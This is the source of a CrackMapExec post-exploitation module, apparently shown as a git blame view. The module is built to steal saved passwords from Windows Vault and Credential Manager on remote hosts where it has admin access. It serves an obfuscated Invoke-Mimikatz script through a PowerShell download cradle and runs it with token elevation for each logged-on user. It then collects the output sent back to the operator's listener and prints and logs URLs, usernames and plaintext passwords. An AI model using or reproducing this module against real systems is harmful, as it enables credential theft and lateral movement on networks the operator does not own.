2017-03-27 21:09:36 +00:00
|
|
|
from cme.helpers.powershell import *
|
|
|
|
from cme.helpers.logger import write_log
|
|
|
|
from datetime import datetime
|
2020-01-18 12:20:10 +00:00
|
|
|
from io import StringIO
|
2017-03-27 21:09:36 +00:00
|
|
|
|
|
|
|
class CMEModule:
|
|
|
|
'''
|
|
|
|
Executes PowerSploit's Invoke-Mimikatz.ps1 script and decrypts stored credentials in Windows Vault/Credential Manager
|
|
|
|
Module by @byt3bl33d3r
|
|
|
|
'''
|
|
|
|
|
|
|
|
name = 'mimikatz_enum_vault_creds'
|
|
|
|
description = "Decrypts saved credentials in Windows Vault/Credential Manager"
|
|
|
|
opsec_safe = True
|
|
|
|
multiple_hosts = True
|
|
|
|
supported_protocols = ['smb', 'mssql']
|
|
|
|
|
|
|
|
def options(self, context, module_options):
|
|
|
|
'''
|
|
|
|
'''
|
|
|
|
|
2017-03-30 00:03:04 +00:00
|
|
|
self.ps_script = obfs_ps_script('powersploit/Exfiltration/Invoke-Mimikatz.ps1')
|
|
|
|
|
2017-03-27 21:09:36 +00:00
|
|
|
def on_admin_login(self, context, connection):
|
|
|
|
command = "Invoke-Mimikatz -Command 'privilege::debug"
|
|
|
|
users = []
|
|
|
|
|
|
|
|
loggedon_users = connection.loggedon_users()
|
|
|
|
for user in loggedon_users:
|
|
|
|
if not user.wkui1_username.endswith('$'):
|
|
|
|
users.append(user.wkui1_username)
|
|
|
|
|
|
|
|
if not users:
|
|
|
|
context.log.error('No logged in users!')
|
|
|
|
return
|
|
|
|
|
|
|
|
for user in users:
|
|
|
|
command += ' "token::elevate /user:{}" vault::list'.format(user)
|
|
|
|
command += " exit'"
|
|
|
|
|
2017-03-30 00:03:04 +00:00
|
|
|
launcher = gen_ps_iex_cradle(context, 'Invoke-Mimikatz.ps1', command)
|
2017-03-27 21:09:36 +00:00
|
|
|
|
2017-10-25 06:45:58 +00:00
|
|
|
connection.ps_execute(launcher)
|
2017-03-27 21:09:36 +00:00
|
|
|
context.log.success('Executed launcher')
|
|
|
|
|
|
|
|
def on_request(self, context, request):
|
|
|
|
if 'Invoke-Mimikatz.ps1' == request.path[1:]:
|
|
|
|
request.send_response(200)
|
|
|
|
request.end_headers()
|
|
|
|
|
2020-01-18 12:20:10 +00:00
|
|
|
request.wfile.write(self.ps_script.encode())
|
2017-03-27 21:09:36 +00:00
|
|
|
|
|
|
|
else:
|
|
|
|
request.send_response(404)
|
|
|
|
request.end_headers()
|
|
|
|
|
|
|
|
def on_response(self, context, response):
|
|
|
|
response.send_response(200)
|
|
|
|
response.end_headers()
|
2020-01-18 12:20:10 +00:00
|
|
|
length = int(response.headers.get('content-length'))
|
|
|
|
data = response.rfile.read(length).decode()
|
2017-03-27 21:09:36 +00:00
|
|
|
|
|
|
|
#We've received the response, stop tracking this host
|
|
|
|
response.stop_tracking_host()
|
|
|
|
|
|
|
|
if len(data):
|
|
|
|
buf = StringIO(data).readlines()
|
|
|
|
creds = []
|
|
|
|
|
|
|
|
try:
|
|
|
|
i = 0
|
|
|
|
while i < len(buf):
|
|
|
|
if ('Ressource' in buf[i]):
|
|
|
|
url = buf[i].split(':', 1)[1].strip().replace('[STRING]', '')
|
|
|
|
user = buf[i+1].split(':', 1)[1].strip().replace('[STRING]', '')
|
|
|
|
passw = buf[i+4].split(':', 1)[1].strip().replace('[STRING]', '')
|
|
|
|
|
2017-05-08 03:16:18 +00:00
|
|
|
if '[BYTE*]' not in passw:
|
|
|
|
creds.append({'url': url, 'user': user, 'passw': passw})
|
2017-03-27 21:09:36 +00:00
|
|
|
|
|
|
|
i += 1
|
|
|
|
except:
|
|
|
|
context.log.error('Error parsing Mimikatz output, please check log file manually for possible credentials')
|
|
|
|
|
|
|
|
if creds:
|
|
|
|
context.log.success('Found saved Vault credentials:')
|
|
|
|
for cred in creds:
|
|
|
|
if cred['user'] and cred['passw']:
|
|
|
|
context.log.highlight('URL: ' + cred['url'])
|
|
|
|
context.log.highlight('Username: ' + cred['user'])
|
|
|
|
context.log.highlight('Password: ' + cred['passw'])
|
|
|
|
context.log.highlight('')
|
|
|
|
|
|
|
|
log_name = 'EnumVaultCreds-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
|
|
|
|
write_log(data, log_name)
|
|
|
|
context.log.info("Saved Mimikatz's output to {}".format(log_name))
|